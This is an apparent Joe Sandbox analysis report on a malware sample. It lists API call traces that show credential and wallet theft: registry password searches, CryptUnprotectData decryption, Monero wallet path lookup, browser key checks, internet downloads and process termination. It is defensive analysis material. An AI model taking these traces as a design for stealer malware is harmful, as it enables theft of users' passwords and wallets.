                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF7B47
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 00FF7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: d90605160b0683521be16cb85bdbaba3959d8d4659213b35260690144b0ddd3e
                                • Instruction ID: 001c5975a3691ac55dda82f07cc0b20eb252fe3f05cad0b2b560e9c9ac15bbde
                                • Opcode Fuzzy Hash: d90605160b0683521be16cb85bdbaba3959d8d4659213b35260690144b0ddd3e
                                • Instruction Fuzzy Hash: C9319272A04228EFCB30EF68E8489BEB7B9EF84714F145519F60593214DB74E941EB50
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 0100820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008243
                                • lstrlen.KERNEL32(00000000), ref: 01008260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008297
                                • lstrlen.KERNEL32(00000000), ref: 010082B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010082EB
                                • lstrlen.KERNEL32(00000000), ref: 01008308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008337
                                • lstrlen.KERNEL32(00000000), ref: 01008351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008380
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: ac1c6d3f21be3afdd70a87204131b28c51610777bec1b9a04f4d9bdfc46f7be4
                                • Instruction ID: 8fa78289035d7ba596b1b95667ae09db4007b5470cbc93a2de14a723002900ef
                                • Opcode Fuzzy Hash: ac1c6d3f21be3afdd70a87204131b28c51610777bec1b9a04f4d9bdfc46f7be4
                                • Instruction Fuzzy Hash: 8F519171900612ABFB65DF38D858A6EBBE8FF40300F118555EE86EB294DB74E950CBD0
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FF784A
                                • StrStrA.SHLWAPI(?,Password), ref: 00FF78B8
                                  • Part of subcall function 00FF7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FF775E
                                  • Part of subcall function 00FF7750: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7765
                                  • Part of subcall function 00FF7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FF778D
                                  • Part of subcall function 00FF7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FF77AD
                                  • Part of subcall function 00FF7750: LocalFree.KERNEL32(?), ref: 00FF77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF78EC
                                • HeapFree.KERNEL32(00000000), ref: 00FF78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00FF7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: b31aaf9cbecdd0f998ea6d03858880e23b0232bb93b762f486105b19edfd883d
                                • Instruction ID: 7b03f527240819a022dc2adfc2b53bb5fc5064903fb350c8a7c94aab9331a1ef
                                • Opcode Fuzzy Hash: b31aaf9cbecdd0f998ea6d03858880e23b0232bb93b762f486105b19edfd883d
                                • Instruction Fuzzy Hash: 617130B1D0021DABDB10DF95DC85AEEF7B8EF44300F144569E609A7210EB75AE85DF90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FF1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FF1173
                                • RegCloseKey.ADVAPI32(?), ref: 00FF117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 00FF114F
                                • wallet_path, xrefs: 00FF116D
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 69f1f43c508f9917b4c1600b162cf1c8a6336c68d462ed87908e48822734ade2
                                • Instruction ID: eee2f736bf22f584718a8bc927e7f4d9556c6e745ba08347ba594d62431470e8
                                • Opcode Fuzzy Hash: 69f1f43c508f9917b4c1600b162cf1c8a6336c68d462ed87908e48822734ade2
                                • Instruction Fuzzy Hash: D6F01D75A40219BBEB209BA1AC4DFAE7B7CEB44715F100154FF05E6244E6B49A4487A0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00FF9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00FF9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00FF9EA7
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • lstrcpy.KERNEL32(00000000,01024C48), ref: 00FF9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: e061b9ddb4a68bac76f17accfa90d3d59d32a97d38c34105c150e060bcd642e3
                                • Instruction ID: 35ae76181a8fbd3bebf4f8d7ab9329c3185d208e4b07bb2fe70d30106de3c808
                                • Opcode Fuzzy Hash: e061b9ddb4a68bac76f17accfa90d3d59d32a97d38c34105c150e060bcd642e3
                                • Instruction Fuzzy Hash: 5351E431A1421D9BCB20EF68DC45BEE77A4EF50314F154024FA49EB2A1DBB8ED44AB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FF565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF5661
                                • InternetOpenA.WININET(0101CFEC,00000000,00000000,00000000,00000000), ref: 00FF5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00FF5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00FF56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 00FF56E1
                                • InternetCloseHandle.WININET(?), ref: 00FF56FA
                                • InternetCloseHandle.WININET(00000000), ref: 00FF5701
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: d46a51908ac2825ff20901db5f0bf93ae28fa2e11d5c48a37721a4a09906e047
                                • Instruction ID: dc82e907ff561d7b656d1c6eb0fd015d69763571ff6aff5ab4b2dd0a53f48ee5
                                • Opcode Fuzzy Hash: d46a51908ac2825ff20901db5f0bf93ae28fa2e11d5c48a37721a4a09906e047
                                • Instruction Fuzzy Hash: 41418071E00218EFDB24DF55E988FAEB7B4FF44714F148069EB089B294E7719981CB94
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 01014759
                                • Process32First.KERNEL32(00000000,00000128), ref: 01014769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 0101477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 010147AB
                                • CloseHandle.KERNEL32(00000000), ref: 010147B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 010147C0
                                • CloseHandle.KERNEL32(00000000), ref: 010147CB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: b7fa2fe99cf05dc3bf4d1d4ce73719eab5856ed010fc68b58b542ae671751b44
                                • Instruction ID: c9d8a66ad4d71b527e75497b66f046c60e6001a32bfdd29e048b88c1f23810db
                                • Opcode Fuzzy Hash: b7fa2fe99cf05dc3bf4d1d4ce73719eab5856ed010fc68b58b542ae671751b44
                                • Instruction Fuzzy Hash: 640184715012287BEB715E64AC8DFEE77ECFB04755F0011C0FA45D5089DB78C9808B64
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 01008435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100846C
                                • lstrlen.KERNEL32(00000000), ref: 010084B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010084E9
                                • lstrlen.KERNEL32(00000000), ref: 010084FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100852E
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 0100853E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 53377ec19b7ec1721e267c8b749921de60870d20af36b9629f90e4258c980d93
                                • Instruction ID: 4948cb95349befb7e41e337aeaa13453c1e421515075956494722ac8413af938
                                • Opcode Fuzzy Hash: 53377ec19b7ec1721e267c8b749921de60870d20af36b9629f90e4258c980d93
                                • Instruction Fuzzy Hash: 53519E719002059FEB65DF68D888A6ABBF8FF44300F15C45EED86DB289EB35E941CB50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 01012925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00D5B858,00000000,00020119,010128A9), ref: 0101294B
                                • RegQueryValueExA.ADVAPI32(010128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 01012965
                                • RegCloseKey.ADVAPI32(010128A9), ref: 0101296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 1ffa90562cbb8ba4b42a1b382035251173ad7b82debd63b315d251fc67349735
                                • Instruction ID: da16c011e581b2a282c30b5cfb970aa56426609b1fd09c7027e74c14c876b968
                                • Opcode Fuzzy Hash: 1ffa90562cbb8ba4b42a1b382035251173ad7b82debd63b315d251fc67349735
                                • Instruction Fuzzy Hash: 9601B575500218BBD730CFA4AC5DEEF7BECEB44755F200098FE85D7245E63556448790
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 01012895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101289C
                                  • Part of subcall function 01012910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 01012925
                                  • Part of subcall function 01012910: RtlAllocateHeap.NTDLL(00000000), ref: 0101292C
                                  • Part of subcall function 01012910: RegOpenKeyExA.ADVAPI32(80000002,00D5B858,00000000,00020119,010128A9), ref: 0101294B
                                  • Part of subcall function 01012910: RegQueryValueExA.ADVAPI32(010128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 01012965
                                  • Part of subcall function 01012910: RegCloseKey.ADVAPI32(010128A9), ref: 0101296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00D5B858,00000000,00020119,01009500), ref: 010128D1
                                • RegQueryValueExA.ADVAPI32(01009500,00D6EB98,00000000,00000000,00000000,000000FF), ref: 010128EC
                                • RegCloseKey.ADVAPI32(01009500), ref: 010128F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
